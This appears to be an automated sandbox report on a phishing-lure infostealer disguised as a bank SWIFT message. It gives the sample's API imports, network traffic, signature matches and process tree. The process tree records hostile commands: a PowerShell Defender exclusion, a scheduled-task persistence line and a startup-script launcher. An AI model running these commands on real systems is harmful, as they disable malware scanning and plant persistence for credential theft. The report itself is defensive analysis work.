KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T09:45:09.483762+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49716	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 09:45:05.606642008 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:45:05.726145029 CET	80	49716	193.122.6.168	192.168.2.9
Nov 25, 2024 09:45:05.726325035 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:45:05.726536036 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:45:05.846208096 CET	80	49716	193.122.6.168	192.168.2.9
Nov 25, 2024 09:45:08.385695934 CET	80	49716	193.122.6.168	192.168.2.9
Nov 25, 2024 09:45:08.411335945 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:45:08.530881882 CET	80	49716	193.122.6.168	192.168.2.9
Nov 25, 2024 09:45:09.363593102 CET	80	49716	193.122.6.168	192.168.2.9
Nov 25, 2024 09:45:09.483762026 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:45:09.528774023 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:09.528814077 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:09.528901100 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:09.580840111 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:09.580854893 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:10.843729019 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:10.843823910 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:10.896487951 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:10.896517992 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:10.896882057 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:11.077748060 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:11.138844013 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:11.183326960 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:11.477070093 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:11.477133989 CET	443	49726	172.67.177.134	192.168.2.9
Nov 25, 2024 09:45:11.477194071 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:45:11.522783995 CET	49726	443	192.168.2.9	172.67.177.134
Nov 25, 2024 09:46:14.363514900 CET	80	49716	193.122.6.168	192.168.2.9
Nov 25, 2024 09:46:14.363614082 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:46:49.375113964 CET	49716	80	192.168.2.9	193.122.6.168
Nov 25, 2024 09:46:49.496320009 CET	80	49716	193.122.6.168	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 09:45:05.461947918 CET	50960	53	192.168.2.9	1.1.1.1
Nov 25, 2024 09:45:05.598881960 CET	53	50960	1.1.1.1	192.168.2.9
Nov 25, 2024 09:45:09.389934063 CET	62628	53	192.168.2.9	1.1.1.1
Nov 25, 2024 09:45:09.528091908 CET	53	62628	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 09:45:05.461947918 CET	192.168.2.9	1.1.1.1	0x9bfa	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:09.389934063 CET	192.168.2.9	1.1.1.1	0x92fc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 09:44:59.069848061 CET	1.1.1.1	192.168.2.9	0xc16b	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 09:44:59.069848061 CET	1.1.1.1	192.168.2.9	0xc16b	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:05.598881960 CET	1.1.1.1	192.168.2.9	0x9bfa	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 09:45:05.598881960 CET	1.1.1.1	192.168.2.9	0x9bfa	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:05.598881960 CET	1.1.1.1	192.168.2.9	0x9bfa	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:05.598881960 CET	1.1.1.1	192.168.2.9	0x9bfa	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:05.598881960 CET	1.1.1.1	192.168.2.9	0x9bfa	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:05.598881960 CET	1.1.1.1	192.168.2.9	0x9bfa	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:09.528091908 CET	1.1.1.1	192.168.2.9	0x92fc	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 25, 2024 09:45:09.528091908 CET	1.1.1.1	192.168.2.9	0x92fc	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49716	193.122.6.168	80	7812	C:\Users\user\AppData\Local\Temp\server01.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 09:45:05.726536036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 09:45:08.385695934 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 08:45:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b24cca37ab0535fc50f0df90f1ce5c3a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 09:45:08.411335945 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 09:45:09.363593102 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 08:45:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 679fb5179b6eaaa66769e4d3a07dde66 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49726	172.67.177.134	443	7812	C:\Users\user\AppData\Local\Temp\server01.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 08:45:11 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 08:45:11 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 08:45:11 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 488220 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TFFjVW7dFY4yYqN3%2BD7IC3t8am%2Bly%2Fkd6hVUa4aM0MPBwiW3JSbDzBkL8gBY28hihLq3ChMQ26UyqWspO5l3afmhr%2FE9rnRC6JsS925iHmQAP3hEY5pgZuNqCnOsbjZAm%2FKj62p8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805c71a83932fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1457813&cwnd=175&unsent_bytes=0&cid=7c0c33ba24618cd9&ts=644&x=0"
2024-11-25 08:45:11 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Target ID:	0
Start time:	03:44:59
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"
Imagebase:	0xa0000
File size:	1'266'176 bytes
MD5 hash:	91809FF066DB31AB6E244E123D3DC970
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:45:01
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\cyclop\directiveness.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"
Imagebase:	0x5f0000
File size:	1'266'176 bytes
MD5 hash:	91809FF066DB31AB6E244E123D3DC970
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1355540566.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:45:03
Start date:	25/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"
Imagebase:	0x8d0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1367554523.0000000002D40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1367391345.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.1359842969.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1368343181.0000000003EA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1365681539.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:45:04
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:	0xdc0000
File size:	70'656 bytes
MD5 hash:	E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:45:04
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server01.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server01.exe"
Imagebase:	0x870000
File size:	98'304 bytes
MD5 hash:	0CDBE0CD3CB5C2F0B2CB17E4417D43F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2592996086.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:45:06
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xf40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:45:06
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xec0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:45:06
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:45:06
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:45:09
Start date:	25/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	03:45:13
Start date:	25/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs"
Imagebase:	0x7ff722f50000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:45:14
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\cyclop\directiveness.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\directiveness.exe"
Imagebase:	0x5f0000
File size:	1'266'176 bytes
MD5 hash:	91809FF066DB31AB6E244E123D3DC970
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
